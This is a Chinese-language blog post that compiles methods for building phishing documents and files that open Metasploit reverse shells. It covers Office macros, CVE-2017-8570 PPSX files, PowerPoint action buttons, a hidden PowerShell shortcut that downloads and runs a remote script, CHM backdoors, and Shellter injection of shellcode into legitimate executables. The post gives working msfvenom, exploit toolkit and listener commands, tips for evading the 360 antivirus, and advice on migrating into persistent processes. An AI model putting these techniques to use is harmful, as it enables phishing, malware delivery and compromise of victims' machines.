各种钓鱼制作方法整理

作者:gqs

原文地址:https://secvul.com/topics/808.html

0x00 概述

最近看了好多钓鱼软件的制作方法,这里做个大自然的搬运工。最终都是运行ps和msf联动。

0x01 office宏

Office宏是一种常见的钓鱼形式,这里使用  nishang-master来制作钓鱼文档。

https://www.secpulse.com/archives/37651.html

这是一款制作宏钓鱼文件(包含ps命令)的powershell脚本集工具,其中包括各种office文件,但是前提对方是开启了宏。

《各种钓鱼制作方法整理》

下面以制作钓鱼excel为例

首先进入ps的窗口,开启执行ps的策略。

《各种钓鱼制作方法整理》

切换到client目录。

《各种钓鱼制作方法整理》

载入脚本,并且加入参数制作钓鱼excel,和你监听端的参数相匹配。

《各种钓鱼制作方法整理》

查看生成钓鱼excel

《各种钓鱼制作方法整理》

此时开启msf的ps监听,—-步骤略。

运行excel,反弹成功。

《各种钓鱼制作方法整理》

0x02 PPT钓鱼 cve-2017-8570

有些人说这个不是8570,不管了总之先贴出来。

参考:http://www.freebuf.com/vuls/144054.html
github工具:https://github.com/tezukanice/Office8570

PS:这个文件有个坑,要重新创建一个template的文件夹,把template.ppsx这个文件要放到里面,具体看py的报错自己调吧。

2.1 生成恶意PPSX文件

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.1.101/logo.doc

2.2 生成反弹shell 的 exe 文件, 对应系统的反弹木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe > shell.exe

《各种钓鱼制作方法整理》

2.3 监听来自 ppsx 执行反弹 shel

python cve-2017-8570_toolkit.py -M exp -e http://192.168.1.101/shell.exe -l shell.exe

《各种钓鱼制作方法整理》

2.4 msf监听,对应payload

msf > use exploit/multi/handler

msf > set LHOST 192.168.1.101

msf > set LPORT 4444

msf > set PAYLOAD windows/meterpreter/reverse_tcp

msf > exploit

《各种钓鱼制作方法整理》

2.5 发送钓鱼 ppsx

《各种钓鱼制作方法整理》

打开后效果如下,加载powershell下载shell.exe  可以看见cmd窗口一闪而过。(但是没截到那个瞬间)

《各种钓鱼制作方法整理》shell.exe进程启动。

《各种钓鱼制作方法整理》

反弹成功

《各种钓鱼制作方法整理》 《各种钓鱼制作方法整理》

0x03 PPT钓鱼之动作按钮

参考:https://evi1cg.me/archives/Create_PPSX.html

若是用户没有开启宏,或者说打上的之前cve-2017-8570的补丁,该怎么钓鱼?

还有一种方法能在pptx中执行命令。

随便新建,打开一个pptx。

选择插入-形状-动作按钮

《各种钓鱼制作方法整理》

这里有两种不同动作,悬停或者单击,选个你认为触发概率高的,有些版本的pptx还有鼠标移过的动作。

《各种钓鱼制作方法整理》

确定后出现一个默认蓝色的方框,可以把它拉倒最大,并且设为白色,边框也白色。

《各种钓鱼制作方法整理》

至此一个隐形的画布已经布置好,你可以在上面加上你喜欢的内容。最终效果如下。

《各种钓鱼制作方法整理》

点击空白触发(如果之前是悬停,移过的动作触发更容易),弹出一个确认按钮(这是缺点)。

《各种钓鱼制作方法整理》

0x04 快捷方式加载ps

创建一个快捷方式,在属性位置处填入

powershell.exe -nop -w hidden -c $v=new-object net.webclient;$v.proxy=[Net.WebRequest]::GetSystemWebProxy();$v.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $v.downloadstring('http://192.168.1.113:8080/');

《各种钓鱼制作方法整理》

双击该快捷方式就运行ps下载远程ps马,运行并且反弹shell到监听端。

《各种钓鱼制作方法整理》

0x05 chm文件

5.1 CHM简介

CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,并可以通过URL与Internet联系在一起。因为使用方便,形式多样也被采用作为电子书的格式。

5.2 CHM后门制作

使用EasyCHM编译如下的html文件

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>

command exec

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

<PARAM name="Command" value="ShortCut">

 <PARAM name="Button" value="Bitmap::shortcut">

 <PARAM name="Item1" value=',notepad.exe'>

 <PARAM name="Item2" value="273,1,1">

</OBJECT>

<SCRIPT>

x.Click();

</SCRIPT>

</body></html>

《各种钓鱼制作方法整理》

Item1是命令位置,注意逗号不能少。

《各种钓鱼制作方法整理》

双击生成的js.chm,发现运行了notepad.exe命令。

《各种钓鱼制作方法整理》 《各种钓鱼制作方法整理》

5.3 那么如何执行命令呢,比如要ps反弹一个msf链接

直接用EasyCHM编译替换value处的内容的html无法实现ps调用(可能编码啥原因)。

Github上有自动生成chm文件的工具,使用Out-CHM(是nishang-master中chm导出模块的2.0版本,修复了原来生成chm文件执行时一闪而过的黑框)制作钓鱼chm文件

https://github.com/hackzx/OutCHM

用以下命令生成和msf监听端对应的chm文件。

OutCHM.py -r http://192.168.1.113:8080 -o outfile.chm

《各种钓鱼制作方法整理》 《各种钓鱼制作方法整理》

打开这个chm

直接执行命令,反弹shell。并且全程360无提示,无弹窗。

《各种钓鱼制作方法整理》

0x06 shelter注入pe文件钓鱼

6.1 前言

shelter是一款对metasploit的反弹马进行加密的程序,可以使他免杀。它可以将shellcode注入到正常的PE文件中,随pe程序运行shellcode也运行。

6.2 安装

开始看见这个工具,好多人说是kali下shellter,所以想装到kali上。

在kali下安装了半天,总是提示缺少wine,搞了半天装上wine还是各种报错,最后放弃。

wine是linux上运行windows程序的依赖组件,既然这样为什么不直接在win下运行?

果断直接在win下运行。

6.3 注入过程

注意宿主程序的选择和靶机的运行环境有关。

这里对一个正常的32位的jre作为宿主程序进行注入。注入msf的meterpreter_tcp_reverse

《各种钓鱼制作方法整理》

首先使用管理员权限运行,否则无法成功注入。

《各种钓鱼制作方法整理》

设置目标参数。

《各种钓鱼制作方法整理》

等待shellter搜索所有jre程序中可以插入shellcode的地方。

《各种钓鱼制作方法整理》

这里选择tcp反弹马,然后设置反弹参数。

《各种钓鱼制作方法整理》

Ok注入成功。

msf开启监听

《各种钓鱼制作方法整理》 《各种钓鱼制作方法整理》

靶机运行已经完成注入的程序。此时可以把j.exe改名成比较正常的名字。

《各种钓鱼制作方法整理》

反弹成功。

360免杀,反弹木马的时候360也没有基于行为来报警。

《各种钓鱼制作方法整理》

6.4 不足

该session链接会随着宿主进程的退出/结束和结束,也就是说受害者如果用该程序装完jdk然后退出了,或者是中途不装了,关掉了,shell都会断开。也就是说正常情况下你的shell控制时间很有限。请尽快使用ps然后migrate命令跳出该进程,注入到explorer进程等随系统运行的持久进程。经测试,开着360安全卫士的win7,注入到qq进程成功,注入firefox,explorer都失败。

或者选择的宿主程序有没有那种运行后直接后台运行,然后用户也不会觉得奇怪的程序?这种宿主程序更完美。

0x07 总结

经测试: 常规的office类文件和ps快捷方式都无法免杀,

但是 chm钓鱼文件和shellter制作钓鱼文件能达到很好的360免杀的效果。

点赞

发表评论